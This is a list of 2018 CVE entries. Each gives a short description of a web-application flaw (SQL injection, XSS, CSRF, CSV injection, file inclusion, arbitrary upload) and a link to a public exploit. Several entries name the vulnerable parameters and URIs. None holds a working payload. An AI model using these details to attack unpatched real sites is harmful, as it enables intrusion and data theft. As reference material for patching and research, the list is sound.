CVE-2018-6583SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&alias= request.https://www.exploit-db.com/exploits/44130
CVE-2018-5987SQL Injection exists in the Pinterest Clone Social Pinboard 2.0 component for Joomla! via the pin_id or user_id parameter in a task=getlikeinfo action, the ends parameter in a view=gift action, the category parameter in a view=home action, the uid parameter in a view=pindisplay action, the searchVal parameter in a view=search action, or the uid parameter in a view=likes action.https://www.exploit-db.com/exploits/44131
CVE-2018-5989SQL Injection exists in the ccNewsletter 2.x component for Joomla! via the id parameter in a task=removeSubscriber action, a related issue to CVE-2011-5099.https://www.exploit-db.com/exploits/44132
CVE-2018-7180SQL Injection exists in the Saxum Astro 4.0.14 component for Joomla! via the publicid parameter.https://www.exploit-db.com/exploits/44133
CVE-2018-7177SQL Injection exists in the Saxum Numerology 3.0.4 component for Joomla! via the publicid parameter.https://www.exploit-db.com/exploits/44134
CVE-2018-7179SQL Injection exists in the SquadManagement 1.0.3 component for Joomla! via the id parameter.https://www.exploit-db.com/exploits/44135
CVE-2018-7178SQL Injection exists in the Saxum Picker 3.2.10 component for Joomla! via the publicid parameter.https://www.exploit-db.com/exploits/44136
CVE-2018-7176FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).https://www.exploit-db.com/exploits/44137
CVE- 2018-7198October CMS through 1.0.431 allows XSS by entering HTML on the Add Posts page.https://www.exploit-db.com/exploits/44144
CVE-2018-7313SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.https://www.exploit-db.com/exploits/44158
CVE-2018-7314SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.https://www.exploit-db.com/exploits/44160
CVE-2018-7315SQL Injection exists in the Ek Rishta 2.9 component for Joomla! via the gender, age1, age2, religion, mothertounge, caste, or country parameter.https://www.exploit-db.com/exploits/44161
CVE-2018-5983SQL Injection exists in the JquickContact 1.3.2.2.1 component for Joomla! via a task=refresh&sid= request.https://www.exploit-db.com/exploits/44118
CVE-2018-6585SQL Injection exists in the JTicketing 2.0.16 component for Joomla! via a view=events action with a filter_creator or filter_events_cat parameter.https://www.exploit-db.com/exploits/44121
CVE-2018-9205Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesn't verify users or sanitize the file path.https://www.exploit-db.com/exploits/44501
CVE-2018-10109Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload in the content section of a new page in the blog catalog.https://www.exploit-db.com/exploits/44502
CVE-2018-10310A persistent cross-site scripting vulnerability has been identified in the web interface of the Catapult UK Cookie Consent plugin before 2.3.10 for WordPress that allows the execution of arbitrary HTML/script code in the context of a victim's browser.https://www.exploit-db.com/exploits/44503
CVE-2018-10312index.php?m=member&v=pw_reset in WUZHI CMS 4.1.0 allows CSRF to change the password of a common member.https://www.exploit-db.com/exploits/44504
CVE-2018-9137Open-AudIT before 2.2 has CSV Injection.https://www.exploit-db.com/exploits/44511
CVE-2018-10258A CSV Injection vulnerability was discovered in Shopy Point of Sale v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.https://www.exploit-db.com/exploits/44534
CVE-2018-10255A CSV Injection vulnerability was discovered in clustercoding Blog Master Pro v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.https://www.exploit-db.com/exploits/44535
CVE-2018-10257A CSV Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.https://www.exploit-db.com/exploits/44536
CVE-2018-10256A SQL Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to directly modify the SQL query.https://www.exploit-db.com/exploits/44537
CVE-2018-10259An Authenticated Stored XSS vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.https://www.exploit-db.com/exploits/44538
CVE-2018-10260A Local File Inclusion vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.https://www.exploit-db.com/exploits/44539
CVE-2018-7602A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.https://www.exploit-db.com/exploits/44542
CVE-2018-10366An issue was discovered in the Users (aka Front-end user management) plugin 1.4.5 for October CMS. XSS exists in the name field.https://www.exploit-db.com/exploits/44546
CVE-2018-10365An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link. The thread link input box is not properly sanitized.https://www.exploit-db.com/exploits/44547
CVE-2018-10321Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings.https://www.exploit-db.com/exploits/44551
CVE-2018-10504The WebDorado "Form Maker by WD" plugin before 1.12.24 for WordPress allows CSV injection.https://www.exploit-db.com/exploits/44559
CVE-2018-10309The Responsive Cookie Consent plugin before 1.8 for WordPress mishandles number fields, leading to XSS.https://www.exploit-db.com/exploits/44563
CVE-2018-10371An issue was discovered in the wunderfarm WF Cookie Consent plugin 1.1.3 for WordPress. A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser via a page title.https://www.exploit-db.com/exploits/44585
CVE-2018-10757CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.https://www.exploit-db.com/exploits/44589
CVE-2018-10580The "Latest Posts on Profile" plugin 1.1 for MyBB has XSS because there is an added section in a user profile that displays that user's most recent posts without sanitizing the tsubject (aka thread subject) field.https://www.exploit-db.com/exploits/44608
CVE-2018-9155Cross-site scripting (XSS) vulnerability in Open-AudIT Professional 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the Admin->Logs section (with a logs?logs.type= URI) and the Manage->Attributes section (via the "Name (display)" field to the attributes/create URI).https://www.exploit-db.com/exploits/44612
CVE-2018-10314Cross-site scripting (XSS) vulnerability in Open-AudIT Community 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the action parameter in the Discover -> Audit Scripts -> List Scripts -> Download section.https://www.exploit-db.com/exploits/44613
CVE-2018-10313WUZHI CMS 4.1.0 allows persistent XSS via the form%5Bqq_10%5D parameter to the /index.php?m=member&f=index&v=profile&set_iframe=1 URI.https://www.exploit-db.com/exploits/44617
CVE-2018-10311A vulnerability was discovered in WUZHI CMS 4.1.0. There is persistent XSS that allows remote attackers to inject arbitrary web script or HTML via the tag[pinyin] parameter to the /index.php?m=tags&f=index&v=add URI.https://www.exploit-db.com/exploits/44618
CVE-2018-5430The Spring web flows of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contain a vulnerability which may allow any authenticated user read-only access to the contents of the web application, including key configuration files. Affected releases include TIBCO Software Inc.'s TIBCO JasperReports Server: versions up to and including 6.2.4; 6.3.0; 6.3.2; 6.3.3;6.4.0; 6.4.2, TIBCO JasperReports Server Community Edition: versions up to and including 6.4.2, TIBCO JasperReports Server for ActiveMatrix BPM: versions up to and including 6.4.2, TIBCO Jaspersoft for AWS with Multi-Tenancy: versions up to and including 6.4.2, TIBCO Jaspersoft Reporting and Analytics for AWS: versions up to and including 6.4.2.https://www.exploit-db.com/exploits/44623
CVE-2018-7465An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the backend of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser will execute everything after the </textarea>, leading to a possible XSS.https://www.exploit-db.com/exploits/44625
CVE-2018-1247RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application.https://www.exploit-db.com/exploits/44634
CVE-2018-9163A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 (Build 5350) allows remote authenticated users (with Add New Technician permissions) to inject arbitrary web script or HTML via the loginName field to technicianAction.do.https://www.exploit-db.com/exploits/44666
CVE-2018-11339An XSS issue was discovered in Frappe ERPNext v11.x.x-develop b1036e5 via a comment.https://www.exploit-db.com/exploits/44691
CVE-2018-11443The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.https://www.exploit-db.com/exploits/44764
CVE-2018-11444A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.https://www.exploit-db.com/exploits/44765
CVE-2018-11332Stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations in ClipperCMS 1.3.3 allows remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors/save_settings.processor.php file.https://www.exploit-db.com/exploits/44775
CVE-2018-11403DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter.https://www.exploit-db.com/exploits/44782
CVE-2018-11404DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter.https://www.exploit-db.com/exploits/44783
CVE-2018-11512Stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general.https://www.exploit-db.com/exploits/44790
CVE-2018-11535An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.https://www.exploit-db.com/exploits/44793
CVE-2018-11523upload.php on NUUO NVRmini 2 devices allows Arbitrary File Upload, such as upload of .php files.https://www.exploit-db.com/exploits/44794
CVE-2018-11532An issue was discovered in the ChangUonDyU Advanced Statistics plugin 1.0.2 for MyBB. changstats.php has XSS, as demonstrated by a subject field.https://www.exploit-db.com/exploits/44795
CVE-2018-11538servlet/UserServlet in SearchBlox 8.6.6 has CSRF via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters because of CSRF Token Bypass.https://www.exploit-db.com/exploits/44801
CVE-2018-11522Yosoro 1.0.4 has stored XSS.https://www.exploit-db.com/exploits/44803
CVE-2018-10094SQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.https://www.exploit-db.com/exploits/44805
CVE-2018-11670An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.https://www.exploit-db.com/exploits/44825
CVE-2018-11628Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters is not properly sanitized, allowing malicious attackers to send a crafted URL for XSS.https://www.exploit-db.com/exploits/44831
CVE-2018-11715The Recent Threads plugin before 1.1 for MyBB allows XSS via a thread subject.https://www.exploit-db.com/exploits/44833
CVE-2018-11581Cross-site scripting (XSS) vulnerability on Brother HL series printers allows remote attackers to inject arbitrary web script or HTML via the url parameter to etc/loginerror.html.https://www.exploit-db.com/exploits/44839
CVE-2018-10969SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.https://www.exploit-db.com/exploits/44867
CVE-2018-12052SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php.https://www.exploit-db.com/exploits/44873
CVE-2018-12054Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.https://www.exploit-db.com/exploits/44874
CVE-2018-12095A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.https://www.exploit-db.com/exploits/44895
CVE-2018-12094Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.https://www.exploit-db.com/exploits/44897
CVE-2018-12613An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).https://www.exploit-db.com/exploits/44924
CVE-2018-12613An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).https://www.exploit-db.com/exploits/44928
CVE-2018-11525The plugin "Advanced Order Export For WooCommerce" for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.https://www.exploit-db.com/exploits/44931
CVE-2018-12705DIGISOL DG-BR4000NG devices have XSS via the SSID (it is validated only on the client side).https://www.exploit-db.com/exploits/44935
CVE-2018-11526The plugin "WordPress Comments Import & Export" for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.https://www.exploit-db.com/exploits/44940
CVE-2018-12636The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.https://www.exploit-db.com/exploits/44943
CVE-2018-12912An issue wan discovered in admin\controllers\database.php in HongCMS 3.0.0. There is a SQL Injection vulnerability via an admin/index.php/database/operate?dbaction=emptytable&tablename= URI.https://www.exploit-db.com/exploits/44953
CVE-2018-12519An issue was discovered in ShopNx through 2017-11-17. The vulnerability allows a remote attacker to upload any malicious file to a Node.js application. An attacker can upload a malicious HTML file that contains a JavaScript payload to steal a user's credentials.https://www.exploit-db.com/exploits/44978
CVE-2018-8738Airties 5444 1.0.0.18 and 5444TT 1.0.0.18 devices allow XSS.https://www.exploit-db.com/exploits/44986
CVE-2018-13849edit_requests.php in yTakkar Instagram-clone through 2018-04-23 has XSS via an onmouseover payload because of an inadequate XSS protection mechanism based on preg_replace.https://www.exploit-db.com/exploits/45003
CVE-2018-1000638MiniCMS version 1.1 contains a Cross Site Scripting (XSS) vulnerability in http://example.org/mc-admin/page.php?date={payload} that can result in code injection.https://www.exploit-db.com/exploits/52175